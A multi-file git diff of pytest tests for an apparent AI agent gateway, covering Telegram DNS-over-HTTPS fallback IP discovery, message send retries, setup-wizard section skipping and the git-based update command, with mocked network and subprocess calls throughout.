raise action
|
||||
status, body = action
|
||||
return self._make_response(status, body, url)
|
||||
return self._make_response(200, {}, url)
|
||||
|
||||
async def __aenter__(self):
|
||||
return self
|
||||
|
||||
async def __aexit__(self, *args):
|
||||
pass
|
||||
|
||||
|
||||
class TestDiscoverFallbackIps:
|
||||
"""Tests for discover_fallback_ips() — DoH-based auto-discovery."""
|
||||
|
||||
def _patch_doh(self, monkeypatch, responses, system_dns_ips=None):
|
||||
"""Wire up fake DoH client and system DNS."""
|
||||
client = FakeDoHClient(responses)
|
||||
monkeypatch.setattr(tnet.httpx, "AsyncClient", lambda **kw: client)
|
||||
|
||||
if system_dns_ips is not None:
|
||||
addrs = [(None, None, None, None, (ip, 443)) for ip in system_dns_ips]
|
||||
monkeypatch.setattr(tnet.socket, "getaddrinfo", lambda *a, **kw: addrs)
|
||||
else:
|
||||
def _fail(*a, **kw):
|
||||
raise OSError("dns failed")
|
||||
monkeypatch.setattr(tnet.socket, "getaddrinfo", _fail)
|
||||
return client
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_google_and_cloudflare_ips_collected(self, monkeypatch):
|
||||
self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": (200, _doh_answer("149.154.167.220")),
|
||||
"https://cloudflare-dns.com": (200, _doh_answer("149.154.167.221")),
|
||||
}, system_dns_ips=["149.154.166.110"])
|
||||
|
||||
ips = await tnet.discover_fallback_ips()
|
||||
assert "149.154.167.220" in ips
|
||||
assert "149.154.167.221" in ips
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_system_dns_ip_excluded(self, monkeypatch):
|
||||
"""The IP from system DNS is the one that doesn't work — exclude it."""
|
||||
self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": (200, _doh_answer("149.154.166.110", "149.154.167.220")),
|
||||
"https://cloudflare-dns.com": (200, _doh_answer("149.154.166.110")),
|
||||
}, system_dns_ips=["149.154.166.110"])
|
||||
|
||||
ips = await tnet.discover_fallback_ips()
|
||||
assert ips == ["149.154.167.220"]
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_doh_results_deduplicated(self, monkeypatch):
|
||||
self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": (200, _doh_answer("149.154.167.220")),
|
||||
"https://cloudflare-dns.com": (200, _doh_answer("149.154.167.220")),
|
||||
}, system_dns_ips=["149.154.166.110"])
|
||||
|
||||
ips = await tnet.discover_fallback_ips()
|
||||
assert ips == ["149.154.167.220"]
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_doh_timeout_falls_back_to_seed(self, monkeypatch):
|
||||
self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": httpx.TimeoutException("timeout"),
|
||||
"https://cloudflare-dns.com": httpx.TimeoutException("timeout"),
|
||||
}, system_dns_ips=["149.154.166.110"])
|
||||
|
||||
ips = await tnet.discover_fallback_ips()
|
||||
assert ips == tnet._SEED_FALLBACK_IPS
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_doh_connect_error_falls_back_to_seed(self, monkeypatch):
|
||||
self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": httpx.ConnectError("refused"),
|
||||
"https://cloudflare-dns.com": httpx.ConnectError("refused"),
|
||||
}, system_dns_ips=["149.154.166.110"])
|
||||
|
||||
ips = await tnet.discover_fallback_ips()
|
||||
assert ips == tnet._SEED_FALLBACK_IPS
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_doh_malformed_json_falls_back_to_seed(self, monkeypatch):
|
||||
self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": (200, {"Status": 0}), # no Answer key
|
||||
"https://cloudflare-dns.com": (200, {"garbage": True}),
|
||||
}, system_dns_ips=["149.154.166.110"])
|
||||
|
||||
ips = await tnet.discover_fallback_ips()
|
||||
assert ips == tnet._SEED_FALLBACK_IPS
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_one_provider_fails_other_succeeds(self, monkeypatch):
|
||||
self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": httpx.TimeoutException("timeout"),
|
||||
"https://cloudflare-dns.com": (200, _doh_answer("149.154.167.220")),
|
||||
}, system_dns_ips=["149.154.166.110"])
|
||||
|
||||
ips = await tnet.discover_fallback_ips()
|
||||
assert ips == ["149.154.167.220"]
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_system_dns_failure_keeps_all_doh_ips(self, monkeypatch):
|
||||
"""If system DNS fails, nothing gets excluded — all DoH IPs kept."""
|
||||
self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": (200, _doh_answer("149.154.166.110", "149.154.167.220")),
|
||||
"https://cloudflare-dns.com": (200, _doh_answer()),
|
||||
}, system_dns_ips=None) # triggers OSError
|
||||
|
||||
ips = await tnet.discover_fallback_ips()
|
||||
assert "149.154.166.110" in ips
|
||||
assert "149.154.167.220" in ips
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_all_doh_ips_same_as_system_dns_uses_seed(self, monkeypatch):
|
||||
"""DoH returns only the same blocked IP — seed list is the fallback."""
|
||||
self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": (200, _doh_answer("149.154.166.110")),
|
||||
"https://cloudflare-dns.com": (200, _doh_answer("149.154.166.110")),
|
||||
}, system_dns_ips=["149.154.166.110"])
|
||||
|
||||
ips = await tnet.discover_fallback_ips()
|
||||
assert ips == tnet._SEED_FALLBACK_IPS
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_cloudflare_gets_accept_header(self, monkeypatch):
|
||||
client = self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": (200, _doh_answer("149.154.167.220")),
|
||||
"https://cloudflare-dns.com": (200, _doh_answer("149.154.167.221")),
|
||||
}, system_dns_ips=["149.154.166.110"])
|
||||
|
||||
await tnet.discover_fallback_ips()
|
||||
|
||||
cf_reqs = [r for r in client.requests_made if "cloudflare" in r["url"]]
|
||||
assert cf_reqs
|
||||
assert cf_reqs[0]["headers"]["Accept"] == "application/dns-json"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_non_a_records_ignored(self, monkeypatch):
|
||||
"""AAAA records (type 28) and CNAME (type 5) should be skipped."""
|
||||
answer = {
|
||||
"Answer": [
|
||||
{"type": 5, "data": "telegram.org"}, # CNAME
|
||||
{"type": 28, "data": "2001:67c:4e8:f004::9"}, # AAAA
|
||||
{"type": 1, "data": "149.154.167.220"}, # A ✓
|
||||
]
|
||||
}
|
||||
self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": (200, answer),
|
||||
"https://cloudflare-dns.com": (200, _doh_answer()),
|
||||
}, system_dns_ips=["149.154.166.110"])
|
||||
|
||||
ips = await tnet.discover_fallback_ips()
|
||||
assert ips == ["149.154.167.220"]
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_invalid_ip_in_doh_response_skipped(self, monkeypatch):
|
||||
answer = {"Answer": [
|
||||
{"type": 1, "data": "not-an-ip"},
|
||||
{"type": 1, "data": "149.154.167.220"},
|
||||
]}
|
||||
self._patch_doh(monkeypatch, {
|
||||
"https://dns.google": (200, answer),
|
||||
"https://cloudflare-dns.com": (200, _doh_answer()),
|
||||
}, system_dns_ips=["149.154.166.110"])
|
||||
|
||||
ips = await tnet.discover_fallback_ips()
|
||||
assert ips == ["149.154.167.220"]
|
||||
@@ -27,7 +27,7 @@ def _ensure_telegram_mock():
|
||||
telegram_mod.constants.ChatType.CHANNEL = "channel"
|
||||
telegram_mod.constants.ChatType.PRIVATE = "private"
|
||||
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants", "telegram.request"):
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants"):
|
||||
sys.modules.setdefault(name, telegram_mod)
|
||||
|
||||
|
||||
@@ -36,14 +36,6 @@ _ensure_telegram_mock()
|
||||
from gateway.platforms.telegram import TelegramAdapter # noqa: E402
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _no_auto_discovery(monkeypatch):
|
||||
"""Disable DoH auto-discovery so connect() uses the plain builder chain."""
|
||||
async def _noop():
|
||||
return []
|
||||
monkeypatch.setattr("gateway.platforms.telegram.discover_fallback_ips", _noop)
|
||||
|
||||
|
||||
def _make_adapter() -> TelegramAdapter:
|
||||
return TelegramAdapter(PlatformConfig(enabled=True, token="test-token"))
|
||||
|
||||
|
||||
@@ -25,7 +25,7 @@ def _ensure_telegram_mock():
|
||||
mod.constants.ChatType.SUPERGROUP = "supergroup"
|
||||
mod.constants.ChatType.CHANNEL = "channel"
|
||||
mod.constants.ChatType.PRIVATE = "private"
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants", "telegram.request"):
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants"):
|
||||
sys.modules.setdefault(name, mod)
|
||||
|
||||
|
||||
|
||||
@@ -1,199 +0,0 @@
|
||||
"""Tests for Telegram send() thread_id fallback.
|
||||
|
||||
When message_thread_id points to a non-existent thread, Telegram returns
|
||||
BadRequest('Message thread not found'). Since BadRequest is a subclass of
|
||||
NetworkError in python-telegram-bot, the old retry loop treated this as a
|
||||
transient error and retried 3 times before silently failing — killing all
|
||||
tool progress messages, streaming responses, and typing indicators.
|
||||
|
||||
The fix detects "thread not found" BadRequest errors and retries the send
|
||||
WITHOUT message_thread_id so the message still reaches the chat.
|
||||
"""
|
||||
|
||||
import sys
|
||||
import types
|
||||
from types import SimpleNamespace
|
||||
|
||||
import pytest
|
||||
|
||||
from gateway.config import PlatformConfig, Platform
|
||||
from gateway.platforms.base import SendResult
|
||||
|
||||
|
||||
# ── Fake telegram.error hierarchy ──────────────────────────────────────
|
||||
# Mirrors the real python-telegram-bot hierarchy:
|
||||
# BadRequest → NetworkError → TelegramError → Exception
|
||||
|
||||
|
||||
class FakeNetworkError(Exception):
|
||||
pass
|
||||
|
||||
|
||||
class FakeBadRequest(FakeNetworkError):
|
||||
pass
|
||||
|
||||
|
||||
# Build a fake telegram module tree so the adapter's internal imports work
|
||||
_fake_telegram = types.ModuleType("telegram")
|
||||
_fake_telegram_error = types.ModuleType("telegram.error")
|
||||
_fake_telegram_error.NetworkError = FakeNetworkError
|
||||
_fake_telegram_error.BadRequest = FakeBadRequest
|
||||
_fake_telegram.error = _fake_telegram_error
|
||||
_fake_telegram_constants = types.ModuleType("telegram.constants")
|
||||
_fake_telegram_constants.ParseMode = SimpleNamespace(MARKDOWN_V2="MarkdownV2")
|
||||
_fake_telegram.constants = _fake_telegram_constants
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _inject_fake_telegram(monkeypatch):
|
||||
"""Inject fake telegram modules so the adapter can import from them."""
|
||||
monkeypatch.setitem(sys.modules, "telegram", _fake_telegram)
|
||||
monkeypatch.setitem(sys.modules, "telegram.error", _fake_telegram_error)
|
||||
monkeypatch.setitem(sys.modules, "telegram.constants", _fake_telegram_constants)
|
||||
|
||||
|
||||
def _make_adapter():
|
||||
from gateway.platforms.telegram import TelegramAdapter
|
||||
|
||||
config = PlatformConfig(enabled=True, token="fake-token")
|
||||
adapter = object.__new__(TelegramAdapter)
|
||||
adapter._config = config
|
||||
adapter._platform = Platform.TELEGRAM
|
||||
adapter._connected = True
|
||||
adapter._dm_topics = {}
|
||||
adapter._dm_topics_config = []
|
||||
adapter._reply_to_mode = "first"
|
||||
adapter._fallback_ips = []
|
||||
adapter._polling_conflict_count = 0
|
||||
adapter._polling_network_error_count = 0
|
||||
adapter._polling_error_callback_ref = None
|
||||
adapter.platform = Platform.TELEGRAM
|
||||
return adapter
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_retries_without_thread_on_thread_not_found():
|
||||
"""When message_thread_id causes 'thread not found', retry without it."""
|
||||
adapter = _make_adapter()
|
||||
|
||||
call_log = []
|
||||
|
||||
async def mock_send_message(**kwargs):
|
||||
call_log.append(dict(kwargs))
|
||||
tid = kwargs.get("message_thread_id")
|
||||
if tid is not None:
|
||||
raise FakeBadRequest("Message thread not found")
|
||||
return SimpleNamespace(message_id=42)
|
||||
|
||||
adapter._bot = SimpleNamespace(send_message=mock_send_message)
|
||||
|
||||
result = await adapter.send(
|
||||
chat_id="123",
|
||||
content="test message",
|
||||
metadata={"thread_id": "99999"},
|
||||
)
|
||||
|
||||
assert result.success is True
|
||||
assert result.message_id == "42"
|
||||
# First call has thread_id, second call retries without
|
||||
assert len(call_log) == 2
|
||||
assert call_log[0]["message_thread_id"] == 99999
|
||||
assert call_log[1]["message_thread_id"] is None
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_raises_on_other_bad_request():
|
||||
"""Non-thread BadRequest errors should NOT be retried — they fail immediately."""
|
||||
adapter = _make_adapter()
|
||||
|
||||
async def mock_send_message(**kwargs):
|
||||
raise FakeBadRequest("Chat not found")
|
||||
|
||||
adapter._bot = SimpleNamespace(send_message=mock_send_message)
|
||||
|
||||
result = await adapter.send(
|
||||
chat_id="123",
|
||||
content="test message",
|
||||
metadata={"thread_id": "99999"},
|
||||
)
|
||||
|
||||
assert result.success is False
|
||||
assert "Chat not found" in result.error
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_without_thread_id_unaffected():
|
||||
"""Normal sends without thread_id should work as before."""
|
||||
adapter = _make_adapter()
|
||||
|
||||
call_log = []
|
||||
|
||||
async def mock_send_message(**kwargs):
|
||||
call_log.append(dict(kwargs))
|
||||
return SimpleNamespace(message_id=100)
|
||||
|
||||
adapter._bot = SimpleNamespace(send_message=mock_send_message)
|
||||
|
||||
result = await adapter.send(
|
||||
chat_id="123",
|
||||
content="test message",
|
||||
)
|
||||
|
||||
assert result.success is True
|
||||
assert len(call_log) == 1
|
||||
assert call_log[0]["message_thread_id"] is None
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_retries_network_errors_normally():
|
||||
"""Real transient network errors (not BadRequest) should still be retried."""
|
||||
adapter = _make_adapter()
|
||||
|
||||
attempt = [0]
|
||||
|
||||
async def mock_send_message(**kwargs):
|
||||
attempt[0] += 1
|
||||
if attempt[0] < 3:
|
||||
raise FakeNetworkError("Connection reset")
|
||||
return SimpleNamespace(message_id=200)
|
||||
|
||||
adapter._bot = SimpleNamespace(send_message=mock_send_message)
|
||||
|
||||
result = await adapter.send(
|
||||
chat_id="123",
|
||||
content="test message",
|
||||
)
|
||||
|
||||
assert result.success is True
|
||||
assert attempt[0] == 3 # Two retries then success
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_thread_fallback_only_fires_once():
|
||||
"""After clearing thread_id, subsequent chunks should also use None."""
|
||||
adapter = _make_adapter()
|
||||
|
||||
call_log = []
|
||||
|
||||
async def mock_send_message(**kwargs):
|
||||
call_log.append(dict(kwargs))
|
||||
tid = kwargs.get("message_thread_id")
|
||||
if tid is not None:
|
||||
raise FakeBadRequest("Message thread not found")
|
||||
return SimpleNamespace(message_id=42)
|
||||
|
||||
adapter._bot = SimpleNamespace(send_message=mock_send_message)
|
||||
|
||||
# Send a long message that gets split into chunks
|
||||
long_msg = "A" * 5000 # Exceeds Telegram's 4096 limit
|
||||
result = await adapter.send(
|
||||
chat_id="123",
|
||||
content=long_msg,
|
||||
metadata={"thread_id": "99999"},
|
||||
)
|
||||
|
||||
assert result.success is True
|
||||
# First chunk: attempt with thread → fail → retry without → succeed
|
||||
# Second chunk: should use thread_id=None directly (effective_thread_id
|
||||
# was cleared per-chunk but the metadata doesn't change between chunks)
|
||||
# The key point: the message was delivered despite the invalid thread
|
||||
@@ -1,7 +1,6 @@
|
||||
"""Tests for gateway service management helpers."""
|
||||
|
||||
import os
|
||||
from pathlib import Path
|
||||
from types import SimpleNamespace
|
||||
|
||||
import hermes_cli.gateway as gateway_cli
|
||||
@@ -355,20 +354,6 @@ class TestGeneratedUnitUsesDetectedVenv:
|
||||
assert "/venv/" not in unit or "/.venv/" in unit
|
||||
|
||||
|
||||
class TestGeneratedUnitIncludesLocalBin:
|
||||
"""~/.local/bin must be in PATH so uvx/pipx tools are discoverable."""
|
||||
|
||||
def test_user_unit_includes_local_bin_in_path(self):
|
||||
unit = gateway_cli.generate_systemd_unit(system=False)
|
||||
home = str(Path.home())
|
||||
assert f"{home}/.local/bin" in unit
|
||||
|
||||
def test_system_unit_includes_local_bin_in_path(self):
|
||||
unit = gateway_cli.generate_systemd_unit(system=True)
|
||||
# System unit uses the resolved home dir from _system_service_identity
|
||||
assert "/.local/bin" in unit
|
||||
|
||||
|
||||
class TestEnsureUserSystemdEnv:
|
||||
"""Tests for _ensure_user_systemd_env() D-Bus session bus auto-detection."""
|
||||
|
||||
|
||||
@@ -94,7 +94,7 @@ class TestOfferOpenclawMigration:
|
||||
fake_mod.Migrator.assert_called_once()
|
||||
call_kwargs = fake_mod.Migrator.call_args[1]
|
||||
assert call_kwargs["execute"] is True
|
||||
assert call_kwargs["overwrite"] is True
|
||||
assert call_kwargs["overwrite"] is False
|
||||
assert call_kwargs["migrate_secrets"] is True
|
||||
assert call_kwargs["preset_name"] == "full"
|
||||
fake_migrator.migrate.assert_called_once()
|
||||
@@ -285,182 +285,3 @@ class TestSetupWizardOpenclawIntegration:
|
||||
setup_mod.run_setup_wizard(args)
|
||||
|
||||
mock_migration.assert_not_called()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _get_section_config_summary / _skip_configured_section — unit tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestGetSectionConfigSummary:
|
||||
"""Test the _get_section_config_summary helper."""
|
||||
|
||||
def test_model_returns_none_without_api_key(self):
|
||||
with patch.object(setup_mod, "get_env_value", return_value=""):
|
||||
result = setup_mod._get_section_config_summary({}, "model")
|
||||
assert result is None
|
||||
|
||||
def test_model_returns_summary_with_api_key(self):
|
||||
def env_side(key):
|
||||
return "sk-xxx" if key == "OPENROUTER_API_KEY" else ""
|
||||
|
||||
with patch.object(setup_mod, "get_env_value", side_effect=env_side):
|
||||
result = setup_mod._get_section_config_summary(
|
||||
{"model": "openai/gpt-4"}, "model"
|
||||
)
|
||||
assert result == "openai/gpt-4"
|
||||
|
||||
def test_model_returns_dict_default_key(self):
|
||||
def env_side(key):
|
||||
return "sk-xxx" if key == "OPENAI_API_KEY" else ""
|
||||
|
||||
with patch.object(setup_mod, "get_env_value", side_effect=env_side):
|
||||
result = setup_mod._get_section_config_summary(
|
||||
{"model": {"default": "claude-opus-4", "provider": "anthropic"}},
|
||||
"model",
|
||||
)
|
||||
assert result == "claude-opus-4"
|
||||
|
||||
def test_terminal_always_returns(self):
|
||||
with patch.object(setup_mod, "get_env_value", return_value=""):
|
||||
result = setup_mod._get_section_config_summary(
|
||||
{"terminal": {"backend": "docker"}}, "terminal"
|
||||
)
|
||||
assert result == "backend: docker"
|
||||
|
||||
def test_agent_always_returns(self):
|
||||
with patch.object(setup_mod, "get_env_value", return_value=""):
|
||||
result = setup_mod._get_section_config_summary(
|
||||
{"agent": {"max_turns": 120}}, "agent"
|
||||
)
|
||||
assert result == "max turns: 120"
|
||||
|
||||
def test_gateway_returns_none_without_tokens(self):
|
||||
with patch.object(setup_mod, "get_env_value", return_value=""):
|
||||
result = setup_mod._get_section_config_summary({}, "gateway")
|
||||
assert result is None
|
||||
|
||||
def test_gateway_lists_platforms(self):
|
||||
def env_side(key):
|
||||
if key == "TELEGRAM_BOT_TOKEN":
|
||||
return "tok123"
|
||||
if key == "DISCORD_BOT_TOKEN":
|
||||
return "disc456"
|
||||
return ""
|
||||
|
||||
with patch.object(setup_mod, "get_env_value", side_effect=env_side):
|
||||
result = setup_mod._get_section_config_summary({}, "gateway")
|
||||
assert "Telegram" in result
|
||||
assert "Discord" in result
|
||||
|
||||
def test_tools_returns_none_without_keys(self):
|
||||
with patch.object(setup_mod, "get_env_value", return_value=""):
|
||||
result = setup_mod._get_section_config_summary({}, "tools")
|
||||
assert result is None
|
||||
|
||||
def test_tools_lists_configured(self):
|
||||
def env_side(key):
|
||||
return "key" if key == "BROWSERBASE_API_KEY" else ""
|
||||
|
||||
with patch.object(setup_mod, "get_env_value", side_effect=env_side):
|
||||
result = setup_mod._get_section_config_summary({}, "tools")
|
||||
assert "Browser" in result
|
||||
|
||||
|
||||
class TestSkipConfiguredSection:
|
||||
"""Test the _skip_configured_section helper."""
|
||||
|
||||
def test_returns_false_when_not_configured(self):
|
||||
with patch.object(setup_mod, "get_env_value", return_value=""):
|
||||
result = setup_mod._skip_configured_section({}, "model", "Model")
|
||||
assert result is False
|
||||
|
||||
def test_returns_true_when_user_skips(self):
|
||||
def env_side(key):
|
||||
return "sk-xxx" if key == "OPENROUTER_API_KEY" else ""
|
||||
|
||||
with (
|
||||
patch.object(setup_mod, "get_env_value", side_effect=env_side),
|
||||
patch.object(setup_mod, "prompt_yes_no", return_value=False),
|
||||
):
|
||||
result = setup_mod._skip_configured_section(
|
||||
{"model": "openai/gpt-4"}, "model", "Model"
|
||||
)
|
||||
assert result is True
|
||||
|
||||
def test_returns_false_when_user_wants_reconfig(self):
|
||||
def env_side(key):
|
||||
return "sk-xxx" if key == "OPENROUTER_API_KEY" else ""
|
||||
|
||||
with (
|
||||
patch.object(setup_mod, "get_env_value", side_effect=env_side),
|
||||
patch.object(setup_mod, "prompt_yes_no", return_value=True),
|
||||
):
|
||||
result = setup_mod._skip_configured_section(
|
||||
{"model": "openai/gpt-4"}, "model", "Model"
|
||||
)
|
||||
assert result is False
|
||||
|
||||
|
||||
class TestSetupWizardSkipsConfiguredSections:
|
||||
"""After migration, already-configured sections should offer skip."""
|
||||
|
||||
def test_sections_skipped_when_migration_imported_settings(self, tmp_path):
|
||||
"""When migration ran and API key exists, model section should be skippable.
|
||||
|
||||
Simulates the real flow: get_env_value returns "" during the is_existing
|
||||
check (before migration), then returns a key after migration imported it.
|
||||
"""
|
||||
args = _first_time_args()
|
||||
|
||||
# Track whether migration has "run" — after it does, API key is available
|
||||
migration_done = {"value": False}
|
||||
|
||||
def env_side(key):
|
||||
if migration_done["value"] and key == "OPENROUTER_API_KEY":
|
||||
return "sk-xxx"
|
||||
return ""
|
||||
|
||||
def fake_migration(hermes_home):
|
||||
migration_done["value"] = True
|
||||
return True
|
||||
|
||||
reloaded_config = {"model": "openai/gpt-4"}
|
||||
|
||||
with (
|
||||
patch.object(setup_mod, "ensure_hermes_home"),
|
||||
patch.object(
|
||||
setup_mod, "load_config",
|
||||
side_effect=[{}, reloaded_config],
|
||||
),
|
||||
patch.object(setup_mod, "get_hermes_home", return_value=tmp_path),
|
||||
patch.object(setup_mod, "get_env_value", side_effect=env_side),
|
||||
patch.object(setup_mod, "is_interactive_stdin", return_value=True),
|
||||
patch("hermes_cli.auth.get_active_provider", return_value=None),
|
||||
patch("builtins.input", return_value=""),
|
||||
# Migration succeeds and flips the env_side flag
|
||||
patch.object(
|
||||
setup_mod, "_offer_openclaw_migration",
|
||||
side_effect=fake_migration,
|
||||
),
|
||||
# User says No to all reconfig prompts
|
||||
patch.object(setup_mod, "prompt_yes_no", return_value=False),
|
||||
patch.object(setup_mod, "setup_model_provider") as mock_model,
|
||||
patch.object(setup_mod, "setup_terminal_backend") as mock_terminal,
|
||||
patch.object(setup_mod, "setup_agent_settings") as mock_agent,
|
||||
patch.object(setup_mod, "setup_gateway") as mock_gateway,
|
||||
patch.object(setup_mod, "setup_tools") as mock_tools,
|
||||
patch.object(setup_mod, "save_config"),
|
||||
patch.object(setup_mod, "_print_setup_summary"),
|
||||
):
|
||||
setup_mod.run_setup_wizard(args)
|
||||
|
||||
# Model has API key → skip offered, user said No → section NOT called
|
||||
mock_model.assert_not_called()
|
||||
# Terminal/agent always have a summary → skip offered, user said No
|
||||
mock_terminal.assert_not_called()
|
||||
mock_agent.assert_not_called()
|
||||
# Gateway has no tokens (env_side returns "" for gateway keys) → section runs
|
||||
mock_gateway.assert_called_once()
|
||||
# Tools have no keys → section runs
|
||||
mock_tools.assert_called_once()
|
||||
|
||||
@@ -267,8 +267,7 @@ def test_restore_stashed_changes_user_declines_reset(monkeypatch, tmp_path, caps
|
||||
|
||||
|
||||
def test_restore_stashed_changes_auto_resets_non_interactive(monkeypatch, tmp_path, capsys):
|
||||
"""Non-interactive mode auto-resets without prompting and returns False
|
||||
instead of sys.exit(1) so the update can continue (gateway /update path)."""
|
||||
"""Non-interactive mode auto-resets without prompting."""
|
||||
calls = []
|
||||
|
||||
def fake_run(cmd, **kwargs):
|
||||
@@ -283,9 +282,9 @@ def test_restore_stashed_changes_auto_resets_non_interactive(monkeypatch, tmp_pa
|
||||
|
||||
monkeypatch.setattr(hermes_main.subprocess, "run", fake_run)
|
||||
|
||||
result = hermes_main._restore_stashed_changes(["git"], tmp_path, "abc123", prompt_user=False)
|
||||
with pytest.raises(SystemExit, match="1"):
|
||||
hermes_main._restore_stashed_changes(["git"], tmp_path, "abc123", prompt_user=False)
|
||||
|
||||
assert result is False
|
||||
out = capsys.readouterr().out
|
||||
assert "Working tree reset to clean state" in out
|
||||
reset_calls = [c for c, _ in calls if c[1:3] == ["reset", "--hard"]]
|
||||
@@ -385,236 +384,3 @@ def test_cmd_update_succeeds_with_extras(monkeypatch, tmp_path):
|
||||
install_cmds = [c for c in recorded if "pip" in c and "install" in c]
|
||||
assert len(install_cmds) == 1
|
||||
assert ".[all]" in install_cmds[0]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# ff-only fallback to reset --hard on diverged history
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _make_update_side_effect(
|
||||
current_branch="main",
|
||||
commit_count="3",
|
||||
ff_only_fails=False,
|
||||
reset_fails=False,
|
||||
fetch_fails=False,
|
||||
fetch_stderr="",
|
||||
):
|
||||
"""Build a subprocess.run side_effect for cmd_update tests."""
|
||||
recorded = []
|
||||
|
||||
def side_effect(cmd, **kwargs):
|
||||
recorded.append(cmd)
|
||||
joined = " ".join(str(c) for c in cmd)
|
||||
if "fetch" in joined and "origin" in joined:
|
||||
if fetch_fails:
|
||||
return SimpleNamespace(stdout="", stderr=fetch_stderr, returncode=128)
|
||||
return SimpleNamespace(stdout="", stderr="", returncode=0)
|
||||
if "rev-parse" in joined and "--abbrev-ref" in joined:
|
||||
return SimpleNamespace(stdout=f"{current_branch}\n", stderr="", returncode=0)
|
||||
if "checkout" in joined and "main" in joined:
|
||||
return SimpleNamespace(stdout="", stderr="", returncode=0)
|
||||
if "rev-list" in joined:
|
||||
return SimpleNamespace(stdout=f"{commit_count}\n", stderr="", returncode=0)
|
||||
if "--ff-only" in joined:
|
||||
if ff_only_fails:
|
||||
return SimpleNamespace(
|
||||
stdout="",
|
||||
stderr="fatal: Not possible to fast-forward, aborting.\n",
|
||||
returncode=128,
|
||||
)
|
||||
return SimpleNamespace(stdout="Updating abc..def\n", stderr="", returncode=0)
|
||||
if "reset" in joined and "--hard" in joined:
|
||||
if reset_fails:
|
||||
return SimpleNamespace(stdout="", stderr="error: unable to write\n", returncode=1)
|
||||
return SimpleNamespace(stdout="HEAD is now at abc123\n", stderr="", returncode=0)
|
||||
return SimpleNamespace(returncode=0, stdout="", stderr="")
|
||||
|
||||
return side_effect, recorded
|
||||
|
||||
|
||||
def test_cmd_update_falls_back_to_reset_when_ff_only_fails(monkeypatch, tmp_path, capsys):
|
||||
"""When --ff-only fails (diverged history), update resets to origin/{branch}."""
|
||||
_setup_update_mocks(monkeypatch, tmp_path)
|
||||
monkeypatch.setattr("shutil.which", lambda name: "/usr/bin/uv" if name == "uv" else None)
|
||||
|
||||
side_effect, recorded = _make_update_side_effect(ff_only_fails=True)
|
||||
monkeypatch.setattr(hermes_main.subprocess, "run", side_effect)
|
||||
|
||||
hermes_main.cmd_update(SimpleNamespace())
|
||||
|
||||
reset_calls = [c for c in recorded if "reset" in c and "--hard" in c]
|
||||
assert len(reset_calls) == 1
|
||||
assert reset_calls[0] == ["git", "reset", "--hard", "origin/main"]
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert "Fast-forward not possible" in out
|
||||
|
||||
|
||||
def test_cmd_update_no_reset_when_ff_only_succeeds(monkeypatch, tmp_path):
|
||||
"""When --ff-only succeeds, no reset is attempted."""
|
||||
_setup_update_mocks(monkeypatch, tmp_path)
|
||||
monkeypatch.setattr("shutil.which", lambda name: "/usr/bin/uv" if name == "uv" else None)
|
||||
|
||||
side_effect, recorded = _make_update_side_effect()
|
||||
monkeypatch.setattr(hermes_main.subprocess, "run", side_effect)
|
||||
|
||||
hermes_main.cmd_update(SimpleNamespace())
|
||||
|
||||
reset_calls = [c for c in recorded if "reset" in c and "--hard" in c]
|
||||
assert len(reset_calls) == 0
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Non-main branch → auto-checkout main
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def test_cmd_update_switches_to_main_from_feature_branch(monkeypatch, tmp_path, capsys):
|
||||
"""When on a feature branch, update checks out main before pulling."""
|
||||
_setup_update_mocks(monkeypatch, tmp_path)
|
||||
monkeypatch.setattr("shutil.which", lambda name: "/usr/bin/uv" if name == "uv" else None)
|
||||
|
||||
side_effect, recorded = _make_update_side_effect(current_branch="fix/something")
|
||||
monkeypatch.setattr(hermes_main.subprocess, "run", side_effect)
|
||||
|
||||
hermes_main.cmd_update(SimpleNamespace())
|
||||
|
||||
checkout_calls = [c for c in recorded if "checkout" in c and "main" in c]
|
||||
assert len(checkout_calls) == 1
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert "fix/something" in out
|
||||
assert "switching to main" in out
|
||||
|
||||
|
||||
def test_cmd_update_switches_to_main_from_detached_head(monkeypatch, tmp_path, capsys):
|
||||
"""When in detached HEAD state, update checks out main before pulling."""
|
||||
_setup_update_mocks(monkeypatch, tmp_path)
|
||||
